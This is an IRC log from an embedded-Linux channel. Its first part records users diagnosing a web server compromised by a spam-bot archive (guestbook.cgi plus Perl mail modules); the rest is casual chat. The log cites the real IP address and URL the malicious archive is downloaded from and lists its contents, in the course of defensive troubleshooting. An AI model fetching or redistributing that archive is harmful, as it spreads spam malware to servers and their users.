`17:47.23`	`sorphin`	`i know`
`17:47.31`	`sorphin`	`i wish i had a honeypot`
`17:47.38`	`Morn`	`?`
`17:47.55`	`sorphin`	`a nice isolated, doesn't matter what happens to it box`
`17:48.01`	`sorphin`	`so i can watch this thing at work`
`17:48.51`	`TimRiker`	`any idea on user/group ownership for the sploit stuff?`
`17:48.53`	`TimRiker`	`does it look like a cgi script issue?`
`17:48.57`	`TimRiker`	`you have looked for lame things like perl binaries in the cgi-bin directory etc I presume?`
`17:49.35`	`sorphin`	`TimRiker: here's what's in the archive`
`17:49.36`	`Morn`	`I don't see any log entries showing how it uploaded the file`
`17:49.36`	`sorphin`	`-rwxrwxr-x zas/staff 5704 2003-02-04 01:28:27 guestbook.cgi`
`17:49.36`	`sorphin`	`drwxrwxr-x zas/staff 0 2003-02-02 04:03:22 lib/`
`17:49.36`	`sorphin`	`drwxrwxr-x zas/staff 0 2003-02-01 05:29:07 lib/Net/`
`17:49.36`	`sorphin`	`-r--rw-r-- zas/staff 8762 2003-02-03 04:11:16 lib/Net/SMTP.pm`
`17:49.36`	`sorphin`	`-r--rw-r-- zas/staff 9703 2003-02-03 04:11:35 lib/Net/Cmd.pm`
`17:49.38`	`sorphin`	`-r--rw-r-- zas/staff 3387 2003-02-03 04:11:26 lib/Net/Config.pm`
`17:49.40`	`sorphin`	`-rw-r--r-- zas/zas 3771 2003-02-03 04:10:56 lib/ForkManager.pm`
`17:49.48`	`Morn`	`just a error message that it was uploaded`
`17:49.49`	`sorphin`	`we can't figure how it's sneaking the file in tho`
`17:50.12`	`Morn`	`there's nothing relavent in the logs other than the formmail searches around the times it happens`
`17:50.33`	`Morn`	`and that guestbook.cgi forks off a lot of processes`
`17:50.39`	`Morn`	`I came home to a load of 30`
`17:50.45`	`TimRiker`	`who is the zas user?`
`17:50.47`	`Morn`	`and 70 processes spamming everyone`
`17:51.06`	`sorphin`	`whoever made that archive on the box it gets it from i guess`
`17:51.28`	`TimRiker`	`oh, is that a tar directory ? or an ls?`
`17:51.29`	`sorphin`	`TimRiker: http://217.106.122.58/archive.tgz`
`17:51.37`	`sorphin`	`a tar`
`17:51.40`	`sorphin`	`that's where it pulls it from`
`17:51.57`	`sorphin`	`something is causing her webserver to fetch that file from that IP`
`17:52.16`	`Morn`	`I guess the best thing is to iptables block that ip`
`17:52.18`	`sorphin`	`Morn: i suspect suExec tho`
`17:52.34`	`Morn`	`hmmm`
`17:52.36`	`sorphin`	`cuz i always see [Mon Feb 3 21:20:55 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbi`
`17:52.39`	`sorphin`	`right before hte exploit`
`17:52.46`	`TimRiker`	`what cgi scripts are installed on the webserver?`
`17:52.54`	`sorphin`	`TimRiker: she has suEXEC running`
`17:52.59`	`sorphin`	`TimRiker: which i don't trust`
`17:53.00`	`Morn`	`TimRiker: A lot of stuff, I have commercial clients`
`17:53.11`	`Morn`	`let me disable suExec`
`17:53.18`	`TimRiker`	`and the clients upload thier own cgi scripts?`
`17:53.38`	`TimRiker`	`I suspect a poorly written cgi script someplace.`
`17:53.51`	`TimRiker`	`many of those are easy to exploit.`
`17:54.19`	`Morn`	`I have a central cgi-bin for most stuff`
`17:54.25`	`Morn`	`but I gave a few clients their own`
`17:54.34`	`Morn`	`but with all the stuff it's hard to keep up with it`
`17:55.58`	`TimRiker`	`giving folks cgi access is effectively giving them shell access. and if they write bad scripts, then you might be giving the world shell access.`
`17:56.20`	`Morn`	`all the users already have shell access`
`17:56.24`	`Morn`	`500 shell users`
`17:56.40`	`Morn`	`but only 2 have their own cgi-bin`
`17:56.47`	`Morn`	`the rest have to send scripts to me first`
`17:57.02`	`Morn`	`I try to encourage the use of php instead of perl scripts`
`17:57.17`	`Morn`	`You know I don't see where to turn off suexec`
`17:57.22`	`*** join/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net)`
`17:57.51`	`*** part/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net)`
`17:59.02`	`sorphin`	`hmm.. all my logs have are codered/nimda and that formmail`
`17:59.05`	`sorphin`	`i feel left out ;)`
`18:00.21`	`sorphin`	`Morn: http://httpd.apache.org/docs/suexec.html`
`18:00.55`	`Morn`	`and if it was something like that I would expect others to be seeing this too`
`18:01.33`	`sorphin`	`i don't think many people leave their apache "Default"`
`18:01.36`	`sorphin`	`i build my own ;p`
`18:02.42`	`Morn`	`I do a bit, but I leave some alone`
`18:02.52`	`Morn`	`I don't think it is suexec though`
`18:02.52`	`Morn`	`since the process runs as the apache user`
`18:03.09`	`sorphin`	`only thing i can thikn of atm`
`18:04.25`	`sorphin`	`might wanna bump up your logging?`
`18:05.18`	`Morn`	`suexec is removed`
`18:06.11`	`Morn`	`LogLevel debug ??`
`18:06.41`	`sorphin`	`that should help`
`18:06.52`	`sorphin`	`set it only for your webserver only`
`18:06.54`	`sorphin`	`not any vhosts`
`18:07.01`	`Morn`	`right`
`20:02.16`	`*** join/#elinux ibot (ibot@rikers.org)`
`20:02.16`	`*** topic/#elinux is Embedded Linux \|\| http://eLinux.org/ \|\| cross compile, uClibc, busybox, tinylogin, handhelds, post-sale linux installs ;-), etc. \|\| debian-handheld list is up.`
`20:02.16`	`*** mode/#eLinux [+o ibot] by ChanServ`
`20:12.31`	`sorphin`	`ibot: wb`
`20:12.32`		`It's great to be back!`
`20:33.59`	`*** join/#elinux sjhill (~NOYB@207-191-210-241.cpe.ats.mcleodusa.net)`
`20:34.06`	`prpplague`	`sjhill: lo ho`
`20:34.19`	`prpplague`	`sjhill: are you still a jobless bum?`
`20:34.31`	`sjhill`	`prpplague: nope, moving to pittsburgh this weekend`
`20:34.41`	`prpplague`	`sjhill: pittsburgh? eww`
`20:34.55`	`sjhill`	`prpplague: it's getting to be a nice city`
`20:35.18`	`prpplague`	`sjhill: what kinda job?`
`20:35.41`	`sjhill`	`prpplague: TimeSys - real-time embedded Linux`
`20:35.47`	`prpplague`	`sjhill: cool`
`20:36.01`	`prpplague`	`sjhill: congrads`
`20:36.06`	`*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) [NETSPLIT VICTIM]`
`20:36.07`	`sjhill`	`thx`
`20:36.14`	`sjhill`	`hi sorphin`
`20:36.16`	`prpplague`	`sjhill: $250k/year right?`
`20:36.19`	`sjhill`	`lo' Lethal`
`20:36.35`	`sjhill`	`prpplague: heh, no, but i got my same salary i had at Broadcom...so i'm happy`
`20:36.56`	`prpplague`	`sjhill: what about moving expenses?`
`20:40.08`	`sjhill`	`all covered`
`20:40.12`	`sorphin`	`sjhill: lo`
`20:40.42`	`sjhill`	`bbl guys`
`20:41.14`	`CosmicPenguin`	`32 people... arn't we popular`
`20:57.41`	`*** part/#elinux da-ve (~dave@212.204.35.114)`
`21:10.41`	`theDevil-`	`hehe`
`21:16.54`	`sorphin`	`<theDevil-> made me do it :P`
`21:21.52`	`kergoth`	`ibot: perl's buildsystem`
`21:21.53`		`methinks perl's buildsystem is the devil!`
`21:21.57`	`kergoth`	`heheh`
`21:24.31`	`sorphin`	`heh`
`21:24.35`	`sorphin`	`Rick Berman Doesn't Know Why Nemesis Tanked`
`21:24.41`	`sorphin`	`because Rick Berman sucks`
`21:27.31`	`prpplague`	`ya get a clue`
`21:27.53`	`sorphin`	`ibot: digi`
`21:27.53`		`sorphin: have you tried http://www.tldp.org/ ?`
`21:27.57`	`sorphin`	`bah`
`21:28.20`	`sorphin`	`ibot: digi is hell, and kergoth is it's slave.`
`21:28.21`		`okay, sorphin`
`21:28.27`	`kergoth`	`truee that`
`21:28.28`	`sorphin`	`ibot: digi?`
`21:28.28`		`[digi] hell, and kergoth is it's slave.`
`21:28.38`	`sorphin`	`doh`
`21:28.55`	`sorphin`	`ibot: no digi is digi is hell, and kergoth is its slave.`
`21:28.56`		`sorphin: I think you lost me on that one`
`21:29.03`	`sorphin`	`ibot: forget digi`
`21:29.03`		`i forgot digi, sorphin`
`21:29.06`	`kergoth`	`need a comma after the no`
`21:29.10`	`sorphin`	`ibot: digi is digi is hell, and kergoth is its slave.`
`21:29.10`		`I think you lost me on that one, sorphin`
`21:29.27`	`sorphin`	`ibot: digi is hell and kergoth is its slave.`
`21:29.28`		`okay, sorphin`
`21:29.34`	`sorphin`	`ibot: digi`
`21:29.34`		`digi is, like, hell and kergoth is its slave.`
`21:29.39`	`sorphin`	`coo`
`22:06.59`	`*** join/#elinux TheMasterMind1 (foobar@h-69-3-152-153.MCLNVA23.covad.net)`
`22:58.33`	`*** part/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com)`
`23:04.27`	`pattieja`	`kergoth: I called DataComm Warehouse about the Magnia SG20 server`
`23:04.42`	`kergoth`	`pattieja: ah, what'd they have to say?`
`23:05.04`	`pattieja`	`kergoth: they couldn't give me an answer on the discrepancy between them selling the units for $300 and Toshiba (the vendor) selling them for $1400`
`23:05.48`	`pattieja`	`plus, they're selling the unit that only has 1 20GB HDD and a PCMCIA slot (empty of course) which is "WiFi-ready" Ooooh!`
`23:05.57`	`kergoth`	`hehe`
`23:06.04`	`pattieja`	`the Wireless network adapter is extra`
`23:06.46`	`pattieja`	`the salesman didn't really know how long they would be able to carry the model and I suppose it's really up to how long/how many Celeron 566's Intel is going to continue to make`
`23:06.51`	`kergoth`	`I ended up picking one up off ebay, new, w/ 2 20gb for $250. course tthat doesnt help you tryiong to use them for a customer.. but fyi thats what they run for amongst individuals`
`23:06.59`	`pattieja`	`that and whether the CPU is embedded on the board or replaceable`
`23:07.12`	`pattieja`	`interesting`
`23:07.21`	`kergoth`	`hmm, I'll open mine up when i receive it and let you know`
`23:07.23`	`pattieja`	`Tiger's got 'em for $45 more`
`23:07.33`	`pattieja`	`294.99 or similar`
`23:09.19`	`pattieja`	`kergoth: I'd really appreciate it. :)`
`23:11.26`	`*** join/#elinux TomW (tom@24.229.147.16)`
`23:12.17`	`TomW`	`sorphin: I'm awake again. :)`
`23:12.46`	`TomW`	`sorphin: one more 8051 program to go and then I can play with WebPal!`
`23:20.22`	`*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com)`
`23:27.39`	`*** join/#elinux mastermnd (~mastermnd@h004854622ae6.ne.client2.attbi.com)`
`23:54.10`	`sieve`	`g'night all`

Generated by irclog2html.pl by Jeff Waugh - find it at freshmeat.net! Modified by Tim Riker to work with blootbot logs, split per channel, etc.